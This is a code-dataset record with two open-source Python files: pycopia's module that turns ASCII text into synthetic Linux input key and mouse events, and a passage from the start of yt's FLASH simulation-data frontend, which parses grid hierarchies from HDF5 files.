hexsha: a2a5c572ace96a2050c5e738be099b29e5352570 | size: 18,473 | ext: py | lang: Python
max_stars: core/pycopia/OS/Linux/event.py | kdart/pycopia3 | 8a7c820f096245411eabbb72345e4f30a35988b6 | ["Apache-2.0"] | count: 3 | 2018-11-26T15:00:20.000Z - 2022-01-28T23:17:58.000Z
max_issues: core/pycopia/OS/Linux/event.py | kdart/pycopia3 | 8a7c820f096245411eabbb72345e4f30a35988b6 | ["Apache-2.0"] | count: null | null - null
max_forks: core/pycopia/OS/Linux/event.py | kdart/pycopia3 | 8a7c820f096245411eabbb72345e4f30a35988b6 | ["Apache-2.0"] | count: 1 | 2018-11-26T15:00:21.000Z - 2018-11-26T15:00:21.000Z
content:
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Interface to produce Linux event stream from ascii data.
"""
from pycopia.fsm import FSM
from pycopia import ascii
from pycopia.OS import scheduler
# meta modifiers for tables
SHIFT = 0x200
ALT = 0x400
META = 0x800
COMPOSE = 0x1000
# from <linux/input.h>
# * Event types
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
# * Synchronization events.
SYN_REPORT = 0
SYN_CONFIG = 1
# * Keys and buttons
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
KEY_103RD = 84
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_KPCOMMA = 121
KEY_HANGUEL = 122
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128
KEY_AGAIN = 129
KEY_PROPS = 130
KEY_UNDO = 131
KEY_FRONT = 132
KEY_COPY = 133
KEY_OPEN = 134
KEY_PASTE = 135
KEY_FIND = 136
KEY_CUT = 137
KEY_HELP = 138
KEY_MENU = 139
KEY_CALC = 140
KEY_SETUP = 141
KEY_SLEEP = 142
KEY_WAKEUP = 143
KEY_FILE = 144
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150
KEY_MSDOS = 151
KEY_COFFEE = 152
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156
KEY_COMPUTER = 157
KEY_BACK = 158
KEY_FORWARD = 159
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169
KEY_ISO = 170
KEY_CONFIG = 171
KEY_HOMEPAGE = 172
KEY_REFRESH = 173
KEY_EXIT = 174
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_SUSPEND = 205
KEY_CLOSE = 206
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_SWITCHVIDEOMODE = 227
KEY_KBDILLUMTOGGLE = 228
KEY_KBDILLUMDOWN = 229
KEY_KBDILLUMUP = 230
KEY_SEND = 231
KEY_REPLY = 232
KEY_FORWARDMAIL = 233
KEY_SAVE = 234
KEY_DOCUMENTS = 235
KEY_BATTERY = 236
KEY_UNKNOWN = 240
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178
KEY_TV = 0x179
KEY_TV2 = 0x17a
KEY_VCR = 0x17b
KEY_VCR2 = 0x17c
KEY_SAT = 0x17d
KEY_SAT2 = 0x17e
KEY_CD = 0x17f
KEY_TAPE = 0x180
KEY_RADIO = 0x181
KEY_TUNER = 0x182
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192
KEY_CHANNELDOWN = 0x193
KEY_FIRST = 0x194
KEY_LAST = 0x195
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
KEY_MAX = 0x1ff
# * Relative axes
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
# * Absolute axes
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
ABS_MAX = 0x3f
# * Switch events
SW_LID = 0x00 # /* set = lid shut */
SW_TABLET_MODE = 0x01 # /* set = tablet mode */
SW_HEADPHONE_INSERT = 0x02 # /* set = inserted */
SW_MAX = 0x0f
# * Misc events
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
# * LEDs
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
# * Autorepeat values
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
# * Sounds
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
# * IDs.
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
BUS_GSC = 0x1A
# Values describing the status of an effect
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
_VALUEMAP = {}
for name, value in list(globals().items()):
if name.startswith("KEY_"):
shortname = name[4:]
_VALUEMAP[shortname] = value
del name, value
_LETTERS = {}
for c in ascii.lowercase:
val = globals()["KEY_%s" % c.upper()]
_LETTERS[c] = val
del c
_DIGITS = {}
for c in ascii.digits:
val = globals()["KEY_%s" % c]
_DIGITS[c] = val
del c
# ascii codes that result from modifiers
# TODO add more ISO-8859-1 symbols
_KEYMAP = { # This reflects a en_US keyboard mapping.
"'": KEY_APOSTROPHE,
',': KEY_COMMA,
'-': KEY_MINUS,
'.': KEY_DOT,
'/': KEY_SLASH,
';': KEY_SEMICOLON,
'=': KEY_EQUAL,
'[': KEY_LEFTBRACE,
']': KEY_RIGHTBRACE,
# '\\': KEY_BACKSLASH, # handled specially, since it is an escape
'`': KEY_GRAVE,
'!': SHIFT | KEY_1,
'"': SHIFT | KEY_APOSTROPHE,
'#': SHIFT | KEY_3,
'$': SHIFT | KEY_4,
'%': SHIFT | KEY_5,
'&': SHIFT | KEY_7,
'(': SHIFT | KEY_9,
')': SHIFT | KEY_0,
'*': SHIFT | KEY_8,
'+': SHIFT | KEY_EQUAL,
':': SHIFT | KEY_SEMICOLON,
'<': SHIFT | KEY_COMMA,
'>': SHIFT | KEY_DOT,
'?': SHIFT | KEY_SLASH,
'@': SHIFT | KEY_2,
'^': SHIFT | KEY_6,
'_': SHIFT | KEY_MINUS,
'{': SHIFT | KEY_LEFTBRACE,
'|': SHIFT | KEY_BACKSLASH,
'}': SHIFT | KEY_RIGHTBRACE,
'~': SHIFT | KEY_GRAVE,
'¥': SHIFT | ALT | KEY_5,
'£': SHIFT | ALT | KEY_3,
}
class RelativeMotionGenerator(object):
def __init__(self, device):
self._device = device # EventDevice handler (only uses write() method).
def MoveUp(self, ticks=1):
self._device.write(EV_REL, REL_Y, -ticks)
self._device.write(EV_SYN, 0, 0)
def MoveDown(self, ticks=1):
self._device.write(EV_REL, REL_Y, ticks)
self._device.write(EV_SYN, 0, 0)
def MoveLeft(self, ticks=1):
self._device.write(EV_REL, REL_X, -ticks)
self._device.write(EV_SYN, 0, 0)
def MoveRight(self, ticks=1):
self._device.write(EV_REL, REL_X, ticks)
self._device.write(EV_SYN, 0, 0)
class AbsoluteMotionGenerator(object):
def __init__(self, device):
self._device = device # EventDevice handler
def MoveTo(self, x, y):
self._device.write(EV_ABS, ABS_X, x)
self._device.write(EV_ABS, ABS_Y, y)
class KeyEventGenerator(object):
"""ASCII in, events out. Call an instance with a string."""
def __init__(self, device, keymap=_KEYMAP):
self._device = device # EventDevice handler (only uses write() method).
self._symbolmapping = keymap
self._init(keymap)
self.reset()
def reset(self):
self._fsm.reset()
self._ctrl = 0 # %C
self._shift = 0 # %S
self._alt = 0 # %A
self._meta = 0 # %M
self._compose = 0 # %O
def __call__(self, text):
for c in text:
self._fsm.process(c)
def _init(self, keymap):
keysyms = "".join(list(keymap.keys()))
f = FSM(0)
f.add_default_transition(self._error, 0)
# key code names are in angle brackets
f.add_transition_list(ascii.lowercase, 0, self._lower, 0)
f.add_transition_list(ascii.uppercase, 0, self._upper, 0)
f.add_transition_list(ascii.digits, 0, self._digit, 0)
f.add_transition_list(keysyms, 0, self._symbols, 0)
f.add_transition_list(ascii.control, 0, self._control, 0)
f.add_transition(" ", 0, self._space, 0)
# Any key name may use the "<NAME>" syntax (without the "KEY_")
f.add_transition('<', 0, self._startkeycode, 2)
f.add_transition_list(ascii.uppercase, 2, self._keyname, 2)
f.add_transition('>', 2, self._keycode, 0)
# slashes escape any special character.
f.add_transition("\\", 0, None, 1)
f.add_transition("\\", 1, self._backslash, 0)
f.add_transition_list("tnrbe", 1, self._specials, 0)
f.add_transition_list(keysyms, 1, self._symbols, 0)
# percent signals meta transitions.
f.add_transition("%", 0, None, 3)
f.add_transition("%", 3, self._symbols, 0)
f.add_transition_list("CcSsAaMmOo", 3, self._stickies, 0)
self._fsm = f
def _error(self, input_symbol, fsm):
msg = 'Error: symbol: %s, state: %s' % (input_symbol, fsm.current_state)
fsm.reset()
raise ValueError(msg)
def _startkeycode(self, c, fsm):
fsm.keyname = ""
def _keyname(self, c, fsm):
fsm.keyname += c
def _presskey(self, val):
self._device.write(EV_KEY, val, 1)
self._device.write(EV_KEY, val, 0)
def _keycode(self, c, fsm):
val = _VALUEMAP[fsm.keyname]
self._presskey(val)
scheduler.sleep(0.1)
def _lower(self, c, fsm):
val = _LETTERS[c]
self._presskey(val)
scheduler.sleep(0.1)
def _upper(self, c, fsm):
val = _LETTERS[c.lower()]
self._device.write(EV_KEY, KEY_LEFTSHIFT, 1)
self._presskey(val)
self._device.write(EV_KEY, KEY_LEFTSHIFT, 0)
scheduler.sleep(0.1)
def _digit(self, c, fsm):
val = _DIGITS[c]
self._presskey(val)
scheduler.sleep(0.1)
def _backslash(self, c, fsm):
self._presskey(KEY_BACKSLASH)
scheduler.sleep(0.1)
def _symbols(self, c, fsm):
d = self._device
val = self._symbolmapping[c]
code = val & 0x1ff
shifted = val & SHIFT
alt = val & ALT
meta = val & META
compose = val & COMPOSE
if compose:
d.write(EV_KEY, KEY_COMPOSE, 1)
if shifted:
d.write(EV_KEY, KEY_LEFTSHIFT, 1)
if alt:
d.write(EV_KEY, KEY_LEFTALT, 1)
if meta:
d.write(EV_KEY, KEY_LEFTMETA, 1)
self._presskey(code)
if meta:
d.write(EV_KEY, KEY_LEFTMETA, 0)
if alt:
d.write(EV_KEY, KEY_LEFTALT, 0)
if shifted:
d.write(EV_KEY, KEY_LEFTSHIFT, 0)
if compose:
d.write(EV_KEY, KEY_COMPOSE, 0)
scheduler.sleep(0.1)
def _specials(self, c, fsm):
if c == "t":
self._device.write(EV_KEY, KEY_TAB, 0)
elif c == "n":
self._device.write(EV_KEY, KEY_ENTER, 0)
elif c == "r":
self._device.write(EV_KEY, KEY_KPENTER, 0)
elif c == "b":
self._device.write(EV_KEY, KEY_BACKSPACE, 0)
elif c == "e":
self._device.write(EV_KEY, KEY_ESC, 0)
scheduler.sleep(0.1)
def _control(self, c, fsm):
val = _LETTERS[chr(ord(c) | 0x60)]
self._device.write(EV_KEY, KEY_LEFTCTRL, 1)
self._presskey(val)
self._device.write(EV_KEY, KEY_LEFTCTRL, 0)
scheduler.sleep(0.1)
def _space(self, c, fsm):
self._presskey(KEY_SPACE)
scheduler.sleep(0.1)
# "sticky" modifiers. Explicitly turned on and off using a % prefix.
def _stickies(self, c, fsm):
if c == "S" and not self._shift:
self._shift = 1
self._device.write(EV_KEY, KEY_LEFTSHIFT, 1)
elif c == "s" and self._shift:
self._shift = 0
self._device.write(EV_KEY, KEY_LEFTSHIFT, 0)
elif c == "C" and not self._ctrl:
self._ctrl = 1
self._device.write(EV_KEY, KEY_LEFTCTRL, 1)
elif c == "c" and self._ctrl:
            self._ctrl = 0  # this branch releases the sticky Ctrl modifier
self._device.write(EV_KEY, KEY_LEFTCTRL, 0)
elif c == "A" and not self._alt:
self._alt = 1
self._device.write(EV_KEY, KEY_LEFTALT, 1)
elif c == "a" and self._alt:
self._alt = 0
self._device.write(EV_KEY, KEY_LEFTALT, 0)
elif c == "M" and not self._meta:
self._meta = 1
self._device.write(EV_KEY, KEY_LEFTMETA, 1)
elif c == "m" and self._meta:
self._meta = 0
self._device.write(EV_KEY, KEY_LEFTMETA, 0)
elif c == "O" and not self._compose:
self._compose = 1
self._device.write(EV_KEY, KEY_COMPOSE, 1)
elif c == "o" and self._compose:
self._compose = 0
self._device.write(EV_KEY, KEY_COMPOSE, 0)
scheduler.sleep(0.1)
# run module as root like this:
# python -i event.py
if __name__ == "__main__":
from pycopia.OS import Input
class MockDevice(object):
def write(self, evtype, code, value):
print(("%s %s %s" % (evtype, code, value)))
def close(self):
pass
#fo = MockDevice()
fo = Input.EventDevice()
fo.find(name="keyboard")
g = KeyEventGenerator(fo)
scheduler.sleep(2)
expected = (ascii.lowercase + "\n" + ascii.uppercase + "\n" + ascii.digits + "\n" +
r"""!"#$&'()*+,-./:;<=>?@[\]^_`{|}~""" + "\n" + "ab%c\tDEF\tghi%\n" )
g('sent = """')
g(ascii.lowercase)
g("\n")
g(ascii.uppercase)
g("\n")
g(ascii.digits)
g("\n")
# You have to slash escape the "<" and \ itself.
g( r"""!"#$&'()*+,-./:;\<=>?@[\\]^_`{|}~""" )
g("\n")
g("ab\%c<TAB>%Sdef%s%Ci%cghi%%" )
g("\n")
g('"""\n')
g('sent == expected\n')
fo.close()
avg_line_length: 20.897059 | max_line_length: 87 | alphanum_fraction: 0.660153
hexsha: 9243936cf817ba3cd57272a64abf95c98d36356e | size: 20,689 | ext: py | lang: Python
max_stars: yt/frontends/flash/data_structures.py | Xarthisius/yt | 321643c3abff64a6f132d98d0747f3558f7552a3 | ["BSD-3-Clause-Clear"] | count: null | null - null
max_issues: yt/frontends/flash/data_structures.py | Xarthisius/yt | 321643c3abff64a6f132d98d0747f3558f7552a3 | ["BSD-3-Clause-Clear"] | count: 31 | 2017-04-19T21:07:18.000Z - 2017-04-20T01:08:43.000Z
max_forks: yt/frontends/flash/data_structures.py | Xarthisius/yt | 321643c3abff64a6f132d98d0747f3558f7552a3 | ["BSD-3-Clause-Clear"] | count: null | null - null
content:
import os
import weakref
import numpy as np
from yt.data_objects.index_subobjects.grid_patch import AMRGridPatch
from yt.data_objects.static_output import Dataset, ParticleFile, validate_index_order
from yt.funcs import mylog, setdefaultattr
from yt.geometry.grid_geometry_handler import GridIndex
from yt.geometry.particle_geometry_handler import ParticleIndex
from yt.utilities.file_handler import HDF5FileHandler, warn_h5py
from yt.utilities.physical_ratios import cm_per_mpc
from .fields import FLASHFieldInfo
class FLASHGrid(AMRGridPatch):
_id_offset = 1
# __slots__ = ["_level_id", "stop_index"]
def __init__(self, id, index, level):
AMRGridPatch.__init__(self, id, filename=index.index_filename, index=index)
self.Parent = None
self.Children = []
self.Level = level
def __repr__(self):
return "FLASHGrid_%04i (%s)" % (self.id, self.ActiveDimensions)
class FLASHHierarchy(GridIndex):
grid = FLASHGrid
_preload_implemented = True
def __init__(self, ds, dataset_type="flash_hdf5"):
self.dataset_type = dataset_type
self.field_indexes = {}
self.dataset = weakref.proxy(ds)
# for now, the index file is the dataset!
self.index_filename = self.dataset.parameter_filename
self.directory = os.path.dirname(self.index_filename)
self._handle = ds._handle
self._particle_handle = ds._particle_handle
self.float_type = np.float64
GridIndex.__init__(self, ds, dataset_type)
def _initialize_data_storage(self):
pass
def _detect_output_fields(self):
self.field_list = [
("flash", s.decode("ascii", "ignore"))
for s in self._handle["/unknown names"][:].flat
]
if "/particle names" in self._particle_handle:
self.field_list += [
("io", "particle_" + s[0].decode("ascii", "ignore").strip())
for s in self._particle_handle["/particle names"][:]
]
def _count_grids(self):
try:
self.num_grids = self.dataset._find_parameter(
"integer", "globalnumblocks", True
)
except KeyError:
try:
self.num_grids = self._handle["simulation parameters"]["total blocks"][
0
]
except KeyError:
self.num_grids = self._handle["/simulation parameters"][0][0]
def _parse_index(self):
f = self._handle # shortcut
ds = self.dataset # shortcut
f_part = self._particle_handle # shortcut
# Initialize to the domain left / domain right
ND = self.dataset.dimensionality
DLE = self.dataset.domain_left_edge
DRE = self.dataset.domain_right_edge
for i in range(3):
self.grid_left_edge[:, i] = DLE[i]
self.grid_right_edge[:, i] = DRE[i]
# We only go up to ND for 2D datasets
self.grid_left_edge[:, :ND] = f["/bounding box"][:, :ND, 0]
self.grid_right_edge[:, :ND] = f["/bounding box"][:, :ND, 1]
# Move this to the parameter file
try:
nxb = ds.parameters["nxb"]
nyb = ds.parameters["nyb"]
nzb = ds.parameters["nzb"]
except KeyError:
nxb, nyb, nzb = (
int(f["/simulation parameters"][f"n{ax}b"]) for ax in "xyz"
)
self.grid_dimensions[:] *= (nxb, nyb, nzb)
try:
self.grid_particle_count[:] = f_part["/localnp"][:][:, None]
except KeyError:
self.grid_particle_count[:] = 0.0
self._particle_indices = np.zeros(self.num_grids + 1, dtype="int64")
if self.num_grids > 1:
np.add.accumulate(
self.grid_particle_count.squeeze(), out=self._particle_indices[1:]
)
else:
self._particle_indices[1] = self.grid_particle_count.squeeze()
# This will become redundant, as _prepare_grid will reset it to its
# current value. Note that FLASH uses 1-based indexing for refinement
# levels, but we do not, so we reduce the level by 1.
self.grid_levels.flat[:] = f["/refine level"][:][:] - 1
self.grids = np.empty(self.num_grids, dtype="object")
for i in range(self.num_grids):
self.grids[i] = self.grid(i + 1, self, self.grid_levels[i, 0])
# This is a possibly slow and verbose fix, and should be re-examined!
rdx = self.dataset.domain_width / self.dataset.domain_dimensions
nlevels = self.grid_levels.max()
dxs = np.ones((nlevels + 1, 3), dtype="float64")
for i in range(nlevels + 1):
dxs[i, :ND] = rdx[:ND] / self.dataset.refine_by ** i
if ND < 3:
dxs[:, ND:] = rdx[ND:]
# Because we don't care about units, we're going to operate on views.
gle = self.grid_left_edge.ndarray_view()
gre = self.grid_right_edge.ndarray_view()
geom = self.dataset.geometry
if geom != "cartesian" and ND < 3:
if geom == "spherical" and ND < 2:
gle[:, 1] = 0.0
gre[:, 1] = np.pi
gle[:, 2] = 0.0
gre[:, 2] = 2.0 * np.pi
return
def _populate_grid_objects(self):
ii = np.argsort(self.grid_levels.flat)
gid = self._handle["/gid"][:]
first_ind = -(self.dataset.refine_by ** self.dataset.dimensionality)
for g in self.grids[ii].flat:
gi = g.id - g._id_offset
# FLASH uses 1-indexed group info
g.Children = [self.grids[i - 1] for i in gid[gi, first_ind:] if i > -1]
for g1 in g.Children:
g1.Parent = g
g._prepare_grid()
g._setup_dx()
if self.dataset.dimensionality < 3:
DD = self.dataset.domain_right_edge[2] - self.dataset.domain_left_edge[2]
for g in self.grids:
g.dds[2] = DD
if self.dataset.dimensionality < 2:
DD = self.dataset.domain_right_edge[1] - self.dataset.domain_left_edge[1]
for g in self.grids:
g.dds[1] = DD
self.max_level = self.grid_levels.max()
class FLASHDataset(Dataset):
_index_class = FLASHHierarchy
_field_info_class = FLASHFieldInfo
_handle = None
def __init__(
self,
filename,
dataset_type="flash_hdf5",
storage_filename=None,
particle_filename=None,
units_override=None,
unit_system="cgs",
default_species_fields=None,
):
self.fluid_types += ("flash",)
if self._handle is not None:
return
self._handle = HDF5FileHandler(filename)
self.particle_filename = particle_filename
if self.particle_filename is None:
# try to guess the particle filename
try:
self._particle_handle = HDF5FileHandler(
filename.replace("plt_cnt", "part")
)
self.particle_filename = filename.replace("plt_cnt", "part")
mylog.info(
"Particle file found: %s", self.particle_filename.split("/")[-1]
)
except OSError:
self._particle_handle = self._handle
else:
# particle_filename is specified by user
self._particle_handle = HDF5FileHandler(self.particle_filename)
# Check if the particle file has the same time
